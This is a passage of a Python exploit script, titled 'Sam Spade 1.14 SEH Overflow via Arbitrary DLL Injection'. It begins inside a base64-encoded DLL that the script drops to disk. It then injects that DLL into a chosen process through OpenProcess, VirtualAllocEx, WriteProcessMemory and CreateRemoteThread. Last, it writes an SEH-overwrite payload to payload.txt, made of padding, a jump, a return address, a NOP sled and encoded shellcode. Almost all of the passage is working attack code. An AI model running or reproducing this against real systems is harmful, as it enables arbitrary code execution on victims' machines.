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xsTWFpbkAxMgBwc2V1ZG8tcmVsb2MtbGlzdC5jAF93MzJfYXRvbV9zdWZmaXgAX19fdzMyX3NoYXJlZHB0cl9kZWZhdWx0X3VuZXhwZWN0ZWQAX19fdzMyX3NoYXJlZHB0cl9nZXQAZHcyX29iamVjdF9tdXRleC4wAGR3Ml9vbmNlLjEAc2psX2ZjX2tleS4yAHNqbF9vbmNlLjMAZWhfZ2xvYmFsc19zdGF0aWMuNABlaF9nbG9iYWxzX2tleS41AGVoX2dsb2JhbHNfb25jZS42AF9fX3czMl9zaGFyZWRwdHJfaW5pdGlhbGl6ZQBfX19zamxqX2luaXRfY3RvcgBfVmlydHVhbFByb3RlY3RAMTYAX19fUlVOVElNRV9QU0VVRE9fUkVMT0NfTElTVF9fAF9fZGF0YV9zdGFydF9fAF9fX0RUT1JfTElTVF9fAF9faW1wX19WaXJ0dWFsUHJvdGVjdEAxNgBfX193MzJfc2hhcmVkcHRyX3Rlcm1pbmF0ZQBfX2ltcF9fVmlydHVhbFF1ZXJ5QDEyAF9fX3Rsc19zdGFydF9fAF9fbGlibXN2Y3J0X2FfaW5hbWUAX19pbXBfX0ZpbmRBdG9tQUA0AF9faW1wX19hYm9ydABfX2RsbF9jaGFyYWN0ZXJpc3RpY3NfXwBfX3NpemVfb2Zfc3RhY2tfY29tbWl0X18AX19zaXplX29mX3N0YWNrX3Jlc2VydmVfXwBfX21ham9yX3N1YnN5c3RlbV92ZXJzaW9uX18AX19fY3J0X3hsX3N0YXJ0X18AX0FkZEF0b21BQDQAX19fY3J0X3hpX3N0YXJ0X18AX19fY3J0X3hpX2VuZF9fAF9WaXJ0dWFsUXVlcnlAMTIAX19pbXBfX19pb2IAX19ic3Nfc3RhcnRfXwBfX19SVU5USU1FX1BTRVVET19SRUxPQ19MSVNUX0VORF9fAF9fc2l6ZV9vZl9oZWFwX2NvbW1pdF9fAF9faW1wX19fZXJybm8AX19fY3J0X3hwX3N0YXJ0X18AX19fY3J0X3hwX2VuZF9fAF9fbWlub3Jfb3NfdmVyc2lvbl9fAF9faGVhZF9saWJtc3ZjcnRfYQBfX2ltYWdlX2Jhc2VfXwBfX3NlY3Rpb25fYWxpZ25tZW50X18AX19SVU5USU1FX1BTRVVET19SRUxPQ19MSVNUX18AX19kYXRhX2VuZF9fAF9fX3czMl9zaGFyZWRwdHIAX19DVE9SX0xJU1RfXwBfX2Jzc19lbmRfXwBfX19jcnRfeGNfZW5kX18AX19fY3J0X3hjX3N0YXJ0X18AX19fQ1RPUl9MSVNUX18AX19pbXBfX0dldEF0b21OYW1lQUAxMgBfX2ltcF9fX19kbGxvbmV4aXQAX19pbXBfX21lbWNweQBfX2ZpbGVfYWxpZ25tZW50X18AX19pbXBfX21hbGxvYwBfX21ham9yX29zX3ZlcnNpb25fXwBfX2ltcF9fX2Fzc2VydABfX19kbGxvbmV4aXQAX19EVE9SX0xJU1RfXwBfX2ltcF9fbWVtc2V0AF9fc2l6ZV9vZl9oZWFwX3Jlc2VydmVfXwBfX19jcnRfeHRfc3RhcnRfXwBfX19JbWFnZUJhc2UAX19zdWJzeXN0ZW1fXwBfX2ltcF9fZmZsdXNoAF9faW1wX19zdHJjcHkAX19fdzMyX3NoYXJlZHB0cl91bmV4cGVjdGVkAF9fX3Rsc19lbmRfXwBfX2ltcF9fZnJlZQBfX21ham9yX2ltYWdlX3ZlcnNpb25fXwBfX2xvYWRlcl9mbGFnc19fAF9faW1wX19wcmludGYAX19pbXBfX0FkZEF0b21BQDQAX19oZWFkX2xpYmtlcm5lbDMyX2EAX19taW5vcl9zdWJzeXN0ZW1fdmVyc2lvbl9fAF9fbWlub3JfaW1hZ2VfdmVyc2lvbl9fAF9faW1wX192ZnByaW50ZgBfRmluZEF0b21BQDQAX0dldEF0b21OYW1lQUAxMgBfX1JVTlRJTUVfUFNFVURPX1JFTE9DX0xJU1RfRU5EX18AX19saWJrZXJuZWwzMl9hX2luYW1lAF9fX2NydF94dF9lbmRfXwBfdmZwcmludGYAX19pbXBfX2Z3cml0ZQA="
bytes = b64decode(b64_dll)
generate = open("payload.dll", "wb")
generate.write(bytes)
generate.close()
dll_injection(PID)
def dll_injection(PID):
# Attempting dll injection
print("[+] Initiating dll injection phase")
sleep(2)
dll_name = "payload.dll"
dll_path = create_string_buffer(dll_name.encode('utf-8'))
# Open Process
hProcess = ctypes.windll.kernel32.OpenProcess(
0x001F0FFF, False, int(PID)
)
if not hProcess:
print("[-] Error: Could not obtain process handle.")
return False
# Allocate Memory
lpBaseAddress = ctypes.windll.kernel32.VirtualAllocEx(
hProcess, None, ctypes.sizeof(dll_path), 0x3000, 0x40
)
if not lpBaseAddress:
print("[-] Error: Could not allocate memory.")
ctypes.windll.kernel32.CloseHandle(hProcess)
return False
# Write DLL path to allocated memory
bytes_written = c_ulong(0)
if not ctypes.windll.kernel32.WriteProcessMemory(
hProcess, lpBaseAddress, ctypes.byref(dll_path), ctypes.sizeof(dll_path),
byref(bytes_written)
):
print("[-] Error: Could not write to process memory.")
ctypes.windll.kernel32.VirtualFreeEx(hProcess, lpBaseAddress, 0, 0x8000)
ctypes.windll.kernel32.CloseHandle(hProcess)
return False
# Create Remote Thread
if not ctypes.windll.kernel32.CreateRemoteThread(
hProcess, None, 0, ctypes.windll.kernel32.GetProcAddress(
ctypes.windll.kernel32.GetModuleHandleA(b"kernel32.dll"), b"LoadLibraryA"
), lpBaseAddress, 0, byref(c_ulong(0))
):
print("[-] Error: Could not create remote thread.")
ctypes.windll.kernel32.VirtualFreeEx(hProcess, lpBaseAddress, 0, 0x8000)
ctypes.windll.kernel32.CloseHandle(hProcess)
return False
print("[+] DLL injected successfully.")
ctypes.windll.kernel32.CloseHandle(hProcess)
sleep(2)
generate_payload()
return True
def generate_payload():
print("[+] Generating payload...")
sleep(1)
shellcode = b""
shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"
payload = b"A" * 531 + struct.pack("<I", 0x909006eb) + struct.pack("<I", 0x
6250120b) + b"\x90" * 32 + shellcode
with open("payload.txt", "wb") as file:
file.write(payload)
sleep(1)
print("[+] payload.txt Generated!")
def main():
global PID
if len(sys.argv) > 1:
PID = sys.argv[1]
banner = "Sam Spade 1.14 SEH Overflow via Arbitrary DLL Injection\n"
print(banner)
print("[+] Selected PID is {}".format(PID))
dropping_dll()
else:
print("Usage: python {} <PID>".format(sys.argv[0]))
sys.exit()
if __name__ == "__main__":
main()